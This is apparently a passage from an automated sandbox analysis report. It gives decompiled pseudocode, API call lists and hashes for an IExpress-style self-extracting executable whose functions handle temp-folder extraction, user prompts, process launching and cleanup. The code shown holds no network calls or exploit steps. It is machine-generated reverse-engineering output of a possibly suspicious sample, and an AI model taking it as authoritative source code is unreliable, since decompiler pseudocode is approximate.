                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                        										_t59 = _t59 + 1;
                                                                                                                                                                                                        										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        										_t41 =  *_t59;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                        							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                        								_t29 = 0xa;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push(_t29);
                                                                                                                                                                                                        							_t30 = E00212BFB(0x210000, 0, _t59); // executed
                                                                                                                                                                                                        							 *0x2181e0 = _t30;
                                                                                                                                                                                                        							__eflags =  *0x2181f8;
                                                                                                                                                                                                        							if( *0x2181f8 == 0) {
                                                                                                                                                                                                        								exit(_t30); // executed
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags =  *0x2181e4;
                                                                                                                                                                                                        							if( *0x2181e4 == 0) {
                                                                                                                                                                                                        								__imp___cexit();
                                                                                                                                                                                                        								_t30 =  *0x2181e0; // 0x80070002
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                        							goto L40;
                                                                                                                                                                                                        							L32:
                                                                                                                                                                                                        							__eflags = _t41 - 0x22;
                                                                                                                                                                                                        							if(_t41 == 0x22) {
                                                                                                                                                                                                        								__eflags = _t54;
                                                                                                                                                                                                        								_t15 = _t54 == 0;
                                                                                                                                                                                                        								__eflags = _t15;
                                                                                                                                                                                                        								_t54 = 0 | _t15;
                                                                                                                                                                                                        								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                        							__imp___ismbblead(_t26);
                                                                                                                                                                                                        							__eflags = _t26;
                                                                                                                                                                                                        							if(_t26 != 0) {
                                                                                                                                                                                                        								_t59 = _t59 + 1;
                                                                                                                                                                                                        								__eflags = _t59;
                                                                                                                                                                                                        								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t59 = _t59 + 1;
                                                                                                                                                                                                        							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L40:
                                                                                                                                                                                                        					return E0021724D(_t30);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t58 = 1;
                                                                                                                                                                                                        				__eflags = 1;
                                                                                                                                                                                                        				goto L7;
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00217155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00217182
                                                                                                                                                                                                          • Part of subcall function 00217155: GetCurrentProcessId.KERNEL32 ref: 00217191
                                                                                                                                                                                                          • Part of subcall function 00217155: GetCurrentThreadId.KERNEL32 ref: 0021719A
                                                                                                                                                                                                          • Part of subcall function 00217155: GetTickCount.KERNEL32 ref: 002171A3
                                                                                                                                                                                                          • Part of subcall function 00217155: QueryPerformanceCounter.KERNEL32(?), ref: 002171B8
                                                                                                                                                                                                        • GetStartupInfoW.KERNEL32(?,002172B8,00000058), ref: 00216A7F
                                                                                                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00216AB4
                                                                                                                                                                                                        • _amsg_exit.MSVCRT ref: 00216AC9
                                                                                                                                                                                                        • _initterm.MSVCRT ref: 00216B1D
                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00216B49
                                                                                                                                                                                                        • exit.KERNELBASE ref: 00216BBF
                                                                                                                                                                                                        • _ismbblead.MSVCRT ref: 00216BDA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836923961-0
                                                                                                                                                                                                        • Opcode ID: 6edfbd9f7f57cf03c628b744f5661e38e5ae2192c1ff4e2dd475a8df085a7b98
                                                                                                                                                                                                        • Instruction ID: bdc471c579f8e78ced21c65abc3c3d623ce68b633c07eca783bb9e4398f33321
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6edfbd9f7f57cf03c628b744f5661e38e5ae2192c1ff4e2dd475a8df085a7b98
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C841C93197922A9FDB219F68E84D7EE77F4BB75714F24401AE841E3290CFB449E18B80
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 631 2158c8-2158d5 632 2158d8-2158dd 631->632 632->632 633 2158df-2158f1 LocalAlloc 632->633 634 2158f3-215901 call 2144b9 633->634 635 215919-215959 call 211680 call 21658a CreateFileA LocalFree 633->635 638 215906-215910 call 216285 634->638 635->638 645 21595b-21596c CloseHandle GetFileAttributesA 635->645 644 215912-215918 638->644 645->638 646 21596e-215970 645->646 646->638 647 215972-21597b 646->647 647->644
                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E002158C8(intOrPtr* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				signed char _t16;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				intOrPtr* _t27;
                                                                                                                                                                                                        				CHAR* _t33;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t33 = __ecx;
                                                                                                                                                                                                        				_t27 = __ecx;
                                                                                                                                                                                                        				_t23 = __ecx + 1;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t6 =  *_t27;
                                                                                                                                                                                                        					_t27 = _t27 + 1;
                                                                                                                                                                                                        				} while (_t6 != 0);
                                                                                                                                                                                                        				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                        				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                        				if(_t20 != 0) {
                                                                                                                                                                                                        					E00211680(_t20, _t36, _t33);
                                                                                                                                                                                                        					E0021658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                        					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                        					_v8 = _t10;
                                                                                                                                                                                                        					LocalFree(_t20);
                                                                                                                                                                                                        					_t12 = _v8;
                                                                                                                                                                                                        					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                        						goto L4;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						CloseHandle(_t12);
                                                                                                                                                                                                        						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                        						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							 *0x219124 = 0;
                                                                                                                                                                                                        							_t14 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E002144B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                        					 *0x219124 = E00216285();
                                                                                                                                                                                                        					_t14 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t14;
                                                                                                                                                                                                        			}














                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00215534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 002158E7
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00215534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00215943
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00215534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0021594D
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,00215534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0021595C
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00215534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00215963
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                                                                                                                                                                                                        • API String ID: 747627703-2825630923
                                                                                                                                                                                                        • Opcode ID: 8f47e808ce745c31e259e935bd07ab4c362571246b858cc993a48f839c9a6f01
                                                                                                                                                                                                        • Instruction ID: 12fa79ded507d7f2e7becd7fd32feb4bd2fb21ebdd37caf3e816c9e0e8c4fe96
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8f47e808ce745c31e259e935bd07ab4c362571246b858cc993a48f839c9a6f01
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4117831621221BBC7201F796C4DBDB7EDDDFA6370B104665F50AD31C1CE7088A18AE0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 675 213fef-214010 676 214016-21403b CreateProcessA 675->676 677 21410a-21411a call 216ce0 675->677 678 214041-21406e WaitForSingleObject GetExitCodeProcess 676->678 679 2140c4-214101 call 216285 GetLastError FormatMessageA call 2144b9 676->679 682 214091 call 21411b 678->682 683 214070-214077 678->683 693 214106 679->693 688 214096-2140b8 CloseHandle * 2 682->688 683->682 687 214079-21407b 683->687 687->682 690 21407d-214089 687->690 691 214108 688->691 692 2140ba-2140c0 688->692 690->682 694 21408b 690->694 691->677 692->691 695 2140c2 692->695 693->691 694->682 695->693
                                                                                                                                                                                                        C-Code - Quality: 84%
                                                                                                                                                                                                        			E00213FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v524;
                                                                                                                                                                                                        				long _v528;
                                                                                                                                                                                                        				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t20;
                                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                                        				int _t25;
                                                                                                                                                                                                        				intOrPtr* _t39;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				intOrPtr _t53;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t45 = __edx;
                                                                                                                                                                                                        				_t20 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                        				_t39 = __ecx;
                                                                                                                                                                                                        				_t49 = 1;
                                                                                                                                                                                                        				_t22 = 0;
                                                                                                                                                                                                        				if(__ecx == 0) {
                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                        					return E00216CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                                                        				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                        				if(_t25 == 0) {
                                                                                                                                                                                                        					 *0x219124 = E00216285();
                                                                                                                                                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                        					_t45 = 0x4c4;
                                                                                                                                                                                                        					E002144B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					_t49 = 0;
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_t22 = _t49;
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                        				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                        				_t44 = _v528;
                                                                                                                                                                                                        				_t53 =  *0x218a28; // 0x0
                                                                                                                                                                                                        				if(_t53 == 0) {
                                                                                                                                                                                                        					_t34 =  *0x219a2c; // 0x0
                                                                                                                                                                                                        					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                        						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                        						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                        							 *0x219a2c = _t44;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E0021411B(_t34, _t44);
                                                                                                                                                                                                        				CloseHandle(_v544.hThread);
                                                                                                                                                                                                        				CloseHandle(_v544);
                                                                                                                                                                                                        				if(( *0x219a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                        					goto L12;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateProcessA.KERNELBASE ref: 00214033
                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00214049
                                                                                                                                                                                                        • GetExitCodeProcess.KERNELBASE ref: 0021405C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 0021409C
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 002140A8
                                                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 002140DC
                                                                                                                                                                                                        • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 002140E9
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
• Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3183975587-0
                                                                                                                                                                                                        • Opcode ID: 9a156749d79e9ae6b154179697916cc8032a06dafe66c1a94179b9bfc1ffea55
                                                                                                                                                                                                        • Instruction ID: dd01dd99e6d51a2dd391445792ce41e710ca32ebc9816f398b16a671ad23dc94
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a156749d79e9ae6b154179697916cc8032a06dafe66c1a94179b9bfc1ffea55
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A1318F31651218BBEB20AF65EC4CFEB77B8EBB8710F2041A9F90DA2161CA304DD5CE51
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E002151E5(void* __eflags) {
                                                                                                                                                                                                        				int _t5;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				void* _t28;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t1 = E0021468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                        				if(_t28 != 0) {
                                                                                                                                                                                                        					if(E0021468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                        						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                        						if(_t5 != 0) {
                                                                                                                                                                                                        							_t6 = E002144B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                        							LocalFree(_t28);
                                                                                                                                                                                                        							if(_t6 != 6) {
                                                                                                                                                                                                        								 *0x219124 = 0x800704c7;
                                                                                                                                                                                                        								L10:
                                                                                                                                                                                                        								return 0;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *0x219124 = 0;
                                                                                                                                                                                                        							L6:
                                                                                                                                                                                                        							return 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						LocalFree(_t28);
                                                                                                                                                                                                        						goto L6;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					E002144B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					LocalFree(_t28);
                                                                                                                                                                                                        					 *0x219124 = 0x80070714;
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E002144B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        				 *0x219124 = E00216285();
                                                                                                                                                                                                        				goto L10;
                                                                                                                                                                                                        			}







                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146A0
                                                                                                                                                                                                          • Part of subcall function 0021468F: SizeofResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146A9
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146C3
                                                                                                                                                                                                          • Part of subcall function 0021468F: LoadResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146CC
                                                                                                                                                                                                          • Part of subcall function 0021468F: LockResource.KERNEL32(00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146D3
                                                                                                                                                                                                          • Part of subcall function 0021468F: memcpy_s.MSVCRT ref: 002146E5
                                                                                                                                                                                                          • Part of subcall function 0021468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002146EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00212F4D,?,00000002,00000000), ref: 00215201
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00215250
                                                                                                                                                                                                          • Part of subcall function 002144B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00214518
                                                                                                                                                                                                          • Part of subcall function 002144B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00214554
                                                                                                                                                                                                          • Part of subcall function 00216285: GetLastError.KERNEL32(00215BBC), ref: 00216285
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$UPROMPT
                                                                                                                                                                                                        • API String ID: 957408736-2980973527
                                                                                                                                                                                                        • Opcode ID: 1b1ebdd33ac093e9f244b8ec08a16d6987b19321c2b899f561b115a10c3fa61b
                                                                                                                                                                                                        • Instruction ID: 6227db1e5e8fb97448fe502e23d7a6ad207da226fa58679c1441b32ae754e3d1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b1ebdd33ac093e9f244b8ec08a16d6987b19321c2b899f561b115a10c3fa61b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5011E676261612BBE3246B716C5DBFB61DDDBF9740B108029FB0AD5190DEB98CE04924
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                                                        			E002152B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                                        				CHAR** _t31;
                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t28 = __edi;
                                                                                                                                                                                                        				_t22 = __ecx;
                                                                                                                                                                                                        				_t21 = __ebx;
                                                                                                                                                                                                        				_t9 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                        				_push(__esi);
                                                                                                                                                                                                        				_t31 =  *0x2191e0; // 0x30b8f48
                                                                                                                                                                                                        				if(_t31 != 0) {
                                                                                                                                                                                                        					_push(__edi);
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t29 = _t31;
                                                                                                                                                                                                        						if( *0x218a24 == 0 &&  *0x219a30 == 0) {
                                                                                                                                                                                                        							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                        							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t31 = _t31[1];
                                                                                                                                                                                                        						LocalFree( *_t29);
                                                                                                                                                                                                        						LocalFree(_t29);
                                                                                                                                                                                                        					} while (_t31 != 0);
                                                                                                                                                                                                        					_pop(_t28);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 =  *0x218a20; // 0x0
                                                                                                                                                                                                        				_pop(_t32);
                                                                                                                                                                                                        				if(_t11 != 0 &&  *0x218a24 == 0 &&  *0x219a30 == 0) {
                                                                                                                                                                                                        					_push(_t22);
                                                                                                                                                                                                        					E00211781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                        					if(( *0x219a34 & 0x00000020) != 0) {
                                                                                                                                                                                                        						E002165E8( &_v268);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                        					_t22 =  &_v268;
                                                                                                                                                                                                        					E00212390( &_v268);
                                                                                                                                                                                                        					_t11 =  *0x218a20; // 0x0
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if( *0x219a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                        					_t11 = E00211FE1(_t22); // executed
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *0x218a20 =  *0x218a20 & 0x00000000;
                                                                                                                                                                                                        				return E00216CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(030B8F48,00000080,?,00000000), ref: 002152F2
                                                                                                                                                                                                        • DeleteFileA.KERNELBASE(030B8F48), ref: 002152FA
                                                                                                                                                                                                        • LocalFree.KERNEL32(030B8F48,?,00000000), ref: 00215305
                                                                                                                                                                                                        • LocalFree.KERNEL32(030B8F48), ref: 0021530C
                                                                                                                                                                                                        • SetCurrentDirectoryA.KERNELBASE(002111FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00215363
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00215334
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                        • API String ID: 2833751637-1116576409
                                                                                                                                                                                                        • Opcode ID: 12cdc41d8605fe9827ab9ec5831f6a37fc2850b32bfaf79766575e3583a87218
                                                                                                                                                                                                        • Instruction ID: 51873df1f9580376d2e3598955e7843e98c745d84ce603e3e66492b91f86f306
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 12cdc41d8605fe9827ab9ec5831f6a37fc2850b32bfaf79766575e3583a87218
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5121DB31921625DBCB219F20FC8CBE977E0AF74780F1481A9E886531A0CFB05DE8CB81
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00211FE1(void* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				if( *0x218530 != 0) {
